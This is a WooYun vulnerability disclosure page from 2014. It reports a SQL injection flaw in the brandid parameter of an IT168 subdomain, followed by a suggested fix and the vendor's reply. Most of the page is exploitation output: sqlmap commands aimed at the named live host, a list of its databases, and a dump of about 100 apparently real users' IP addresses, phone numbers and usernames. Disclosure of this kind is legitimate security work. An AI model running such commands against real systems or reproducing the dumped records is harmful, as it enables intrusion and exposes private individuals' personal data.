当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078562

漏洞标题:it168分站存在SQL注入漏洞

相关厂商:IT168.com

漏洞作者: Eoh

提交时间:2014-10-07 17:21

修复时间:2014-11-21 17:22

公开时间:2014-11-21 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-07: 细节已通知厂商并且等待厂商处理中
2014-10-09: 厂商已经确认,细节仅向厂商公开
2014-10-19: 细节向核心白帽子及相关领域专家公开
2014-10-29: 细节向普通白帽子公开
2014-11-08: 细节向实习白帽子公开
2014-11-21: 细节向公众公开

简要描述:

未对用户输入正确执行危险字符清理

详细说明:

存在注入参数brandid
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --banner

web application technology: PHP 5.5.5, Nginx
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.50-log'

漏洞证明:

python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --dbs
available databases [38]:
[*] ad
[*] aix
[*] bsd
[*] che
[*] comment
[*] count
[*] cu_download
[*] cu_job
[*] cu_jobs
[*] cublog
[*] cucms
[*] db_book
[*] db_edu
[*] db_print
[*] db_product
[*] db_salon
[*] db_techlink
[*] db_youxidian
[*] diaocha
[*] doc
[*] ebookmail
[*] gongho
[*] help
[*] hi
[*] information_schema
[*] ittimes
[*] ittimes2
[*] linuxpublish
[*] mysql
[*] newspub
[*] test
[*] tushu
[*] uc_gbk
[*] vote
[*] vote2
[*] wiki
[*] wiki_utf8
[*] wotuiwole


python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 -D diaocha -T it168_2009 -C id,ip,phone,username --start=1 --stop=100 --dump
取前100条数据
Database: diaocha
Table: it168_2009
[100 entries]
+-----+-----------------+----------------------------+----------------------------------------------------------+
| id | ip | phone | username |
+-----+-----------------+----------------------------+----------------------------------------------------------+
| 64 | 202.108.130.138 | 13810759208 | dearcelina |
| 63 | 222.175.109.50 | 13910182143 | badboyokokok |
| 62 | 210.51.173.169 | 58022266\\u00a3\\u00ad589 | fire9 |
| 7 | 123.103.43.232 | 13466592878 | dzb_01 |
| 8 | 124.64.72.238 | 13811703481 | kid.xiyang |
| 9 | 123.124.198.195 | 64242299 | duxuetao |
| 10 | 125.33.130.146 | 13910301945 | eveson |
| 11 | 125.33.130.146 | 13811810491 | shilihua |
| 12 | 203.187.191.167 | 13466379758 | agen_0502 |
| 13 | 202.99.23.184 | 010-65368391\\/15810566366 | TerryGong |
| 14 | 202.99.23.184 | 010-65368389\\/13910325421 | mrrun |
| 15 | 221.221.218.251 | 13260003537 | guangzidao |
| 16 | 125.34.208.136 | 13911463824 | \\u00bd\\u00a3\\u00b4\\u00ce\\u00c0\\u00c7 |
| 17 | 211.99.216.18 | 150001383472 | yudi2006 |
| 18 | 211.155.253.89 | 15011051647 | zhangjunyi |
| 19 | 211.103.237.35 | 15011424628 | cst05001 |
| 20 | 123.112.82.106 | 13910116314 | polokus |
| 21 | 218.240.131.114 | 15811055822 | Seker |
| 22 | 211.99.216.18 | 84562121-1055 | lktpd |
| 23 | 222.134.206.253 | 13506346064 | zhaoxian |
| 24 | 222.134.206.253 | 010-62083613 | fadianjizu |
| 25 | 202.108.145.77 | 13621108444 | ziggler |
| 26 | 124.192.11.35 | 010-65339328 | jerrywjl |
| 27 | 219.237.194.111 | 13810436018 | opbsder |
| 28 | 202.106.68.98 | 13466641423 | Ksharp |
| 29 | 124.42.101.210 | 13269651468 | senir |
| 30 | 61.172.241.98 | 13816778816 | crazymeny |
| 31 | 211.99.216.18 | 13910402240 | sleepycat |
| 32 | 124.42.101.210 | 13488867086 | firefly.jiang |
| 33 | 125.69.110.149 | 13540418960 | yellowking |
| 34 | 123.112.113.91 | 13381221392 | freet15 |
| 35 | 219.143.44.130 | 15010248504 | gyl4802959 |
| 36 | 222.128.23.6 | 15810729060 | a1my |
| 37 | 219.143.47.18 | 13401001191 | arcow |
| 38 | 221.218.164.211 | 13911152920 | \\u00c5\\u00d6\\u00f3\\u00ac\\u00f3\\u00b0 |
| 39 | 211.88.30.160 | 15811195112 | \\u00b9\\u00ab\\u00d7\\u00d3Q |
| 40 | 123.122.101.150 | 15810815043 | shenmue71 |
| 41 | 202.108.39.249 | 13570214027 | \\u00ce\\u00de\\u00c9\\u00f9\\u00ce\\u00de\\u00cf\\u00a2 |
| 42 | 222.128.23.6 | 13810832224 | tingfengmanbu |
| 43 | 202.108.39.249 | 02085106238 | hotsnow |
| 44 | 202.91.179.43 | 13439954909 | davidhan2009 |
| 45 | 124.193.83.30 | 13521512328 | hyran |
| 46 | 61.135.165.11 | 01063001300 | \\u00ca\\u00af\\u00d5\\u00b9 |
| 47 | 124.205.77.176 | 13661240387 | cindylzh |
| 48 | 61.135.165.12 | 15010133354 | hdksky |
| 49 | 211.99.20.6 | 13811431506 | spihiker |
| 50 | 202.106.94.136 | 13720056292 | xiegang112 |
| 51 | 210.77.2.98 | 13141322077 | tyc611 |
| 52 | 123.112.228.164 | 010-63480456 | chuhongze |
| 53 | 125.34.142.230 | 13911310157 | changchun_li |
| 54 | 123.127.220.10 | 13426219387 | aero |
| 55 | 124.205.77.23 | 13426342308 | fashionstyle |
| 56 | 122.200.74.162 | 13520239976 | chaucerliu |
| 57 | 202.108.145.11 | 13810929417 | songyupo |
| 58 | 211.155.253.89 | 13910018687 | hlglty |
| 59 | 211.155.253.89 | 13811050141 | bithuan |
| 60 | 218.249.43.227 | 15901232259 | craneflyfly |
| 61 | 218.19.0.29 | 13005150787 | mamalove |
| 65 | 124.193.150.98 | 88027749-8091 | ly_cyz |
| 66 | 211.103.249.4 | 13718227935 | 271329410 |
| 67 | 211.103.249.4 | 13141370583 | qingyangs |
| 68 | 218.249.49.194 | 01063182771 | wwj11998 |
| 69 | 221.222.145.82 | 13488675472 | human.gold |
| 70 | 59.151.54.34 | 58325249 | redhat.zhou |
| 71 | 211.157.5.116 | 58325260 | maxcl |
| 72 | 59.108.42.241 | 010-84105839 | zouyi2005 |
| 73 | 61.135.159.228 | 13810689432 | h_xin8211 |
| 74 | 219.237.242.160 | 13269997344 | xiaoqi8866 |
| 75 | 218.240.136.221 | 15811015463 | tljwcm |
| 76 | 218.240.136.221 | 58834046 | alexsun72 |
| 77 | 123.118.119.10 | 15910647819 | niangao1005 |
| 78 | 202.8.27.5 | 13910627963 | wshun |
| 79 | 218.247.142.203 | 62135687-866 | cah |
| 80 | 203.86.84.36 | 13520902241 | \\u00c7\\u00e5\\u00b3\\u00bf\\u00b9\\u00e2 |
| 81 | 211.151.88.39 | 15801465152 | llfxt |
| 82 | 221.221.22.162 | 13264294906 | superlifebuoy |
| 83 | 60.28.240.69 | 13581731367 | dlx1986 |
| 84 | 219.239.107.2 | 88196725 | gust |
| 85 | 58.207.156.10 | 13810625240 | litaopier |
| 86 | 221.221.22.162 | 13810969780 | \\u00b4\\u00ba\\u00c8\\u00a5\\u00c7\\u00ef\\u00c0\\u00b4 |
| 87 | 219.224.99.205 | 13811450340 | yanaiming |
| 88 | 210.76.108.158 | 13426332010 | qiaobinbin |
| 89 | 124.205.77.104 | 15910685356 | billzhou |
| 90 | 58.83.131.8 | 13393362792 | forward51 |
| 91 | 60.30.68.151 | 022-63981890 | race |
| 92 | 58.83.131.8 | 13393362792 | forward52 |
| 93 | 58.31.141.23 | 15810293009 | pc0326 |
| 94 | 58.83.131.4 | 13811934236 | dongchun123 |
| 95 | 124.200.56.57 | 13601216657 | qinershi |
| 96 | 211.69.198.196 | 15171459982 | dawdo |
| 97 | 60.10.82.82 | 13910909137 | zhylyq |
| 98 | 124.64.106.88 | 13811920823 | yj11 |
| 99 | 123.112.77.47 | (8610)88432858-8252 | liurunfeng |
| 100 | 124.42.72.18 | 13911319742 | \\u00be\\u00b8\\u00bf\\u00b5 |
| 101 | 119.143.128.112 | 13372520776 | single_element |
| 102 | 125.96.85.194 | 62792944-222 | youngcow |
| 103 | 124.126.86.40 | 13911506054 | cnhtml |
| 104 | 202.108.130.138 | 13651083526 | winice |
| 105 | 119.254.240.146 | 13910114233 | RAULNAN |
| 106 | 218.240.2.98 | 13811088383 | xjc2694 |
+-----+-----------------+----------------------------+----------------------------------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-09 10:28

厂商回复:

已终止的业务,内部沟通问题未停止指向,多谢帮助。

最新状态:

暂无


漏洞评价:

评论